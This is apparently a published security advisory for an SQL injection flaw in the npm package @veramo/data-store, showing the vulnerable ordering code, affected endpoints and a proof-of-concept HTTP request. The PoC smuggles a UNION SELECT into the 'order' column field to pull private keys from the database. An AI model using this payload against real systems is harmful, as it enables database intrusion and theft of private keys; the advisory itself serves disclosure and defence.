PT-2026-4846 · Npm · @Veramo/Data-Store
Published
2026-01-16
·
Updated
2026-01-16
CVSS v3.1
6.8
Medium
| Vector | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N |
Summary
An SQL injection vulnerability exists in the
@veramo/data-store package that allows any authenticated user to execute arbitrary SQL queries against the database. The vulnerability is caused by insufficient validation of the column parameter in the order array of query requests.Details
packages/data-store/src/data-store-orm.ts (lines 416-434)The vulnerability exists in the
decorateQB() function which processes query ordering parameters:typescript
function decorateQB(
qb: SelectQueryBuilder<any>,
tableName: string,
input: FindArgs<any>,
): SelectQueryBuilder<any> {
if (input?.skip) qb = qb.offset(input.skip)
if (input?.take) qb = qb.limit(input.take)
if (input?.order) {
for (const item of input.order) {
qb = qb.addSelect(
qb.connection.driver.escape(tableName) + '.' + qb.connection.driver.escape(item.column),
item.column,
)
qb = qb.orderBy(qb.connection.driver.escape(item.column), item.direction)
}
}
return qb
}Root Cause:
- The
item.columnvalue from user input is passed directly as the alias parameter toaddSelect()without any sanitization or validation - While TypeScript defines allowed column types (e.g.,
TCredentialColumns = 'context' | 'type' | ...), this is only compile-time checking - At runtime, the function accepts
FindArgs<any>, allowing arbitrary strings to bypass type restrictions - TypeORM inserts the alias directly into the SQL query, enabling SQL injection
Affected Endpoints:
All endpoints are located in
packages/data-store/src/data-store-orm.ts:| Endpoint | Method | Line |
|---|---|---|
dataStoreORMGetIdentifiers | identifiersQuery() | 85-98 |
dataStoreORMGetMessages | messagesQuery() | 129-153 |
dataStoreORMGetVerifiableCredentialsByClaims | claimsQuery() | 168-198 |
dataStoreORMGetVerifiableCredentials | credentialsQuery() | 227-252 |
dataStoreORMGetVerifiablePresentations | presentationsQuery() | 275-297 |
All these methods call
decorateQB() which processes the vulnerable order parameter.PoC
Prerequisites:
- A running Veramo agent with the REST API exposed (e.g., via
@veramo/remote-server) - Valid authentication credentials (Bearer token)
- The agent uses
@veramo/data-storewith a SQLite or compatible database
Example Exploit to Extract Private Keys From DB:
http
POST /agent/dataStoreORMGetVerifiableCredentialsByClaims HTTP/1.1
Host: localhost:3332
Content-Length: 811
Authorization: Bearer test123
Content-Type: application/json
{ "where":[
{
"value": [
"string"
],
"not": true,
"op": "foo",
"column":"bar"
}
],
"skip": 0,
"take": 11111232323230,
"order": [
{
"direction": "ASC","column":"issuanceDate" AS "issuanceDate" FROM "claim" "claim" LEFT JOIN "identifier" "issuer" ON "issuer"."did"="claim"."issuerDid" LEFT JOIN "identifier" "subject" ON "subject"."did"="claim"."subjectDid" LEFT JOIN "credential" "credential" ON "credential"."hash"="claim"."credentialHash" where not(claim.isObj in (?)) and 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(SELECT json object('alias', alias, 'type', type, 'privateKeyHex', privateKeyHex) ),22,23,24,25,26,27,28,29 from `private-key`-- -"
}
]
}similar exploit could be used against the other affected endpoints
Impact
Attack capabilities:
- Complete database read access
- Reading or write files into fs depending on dbms used
- Database-specific escalation paths
- Dos through timebased or multiple long running queries
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
@Veramo/Data-Store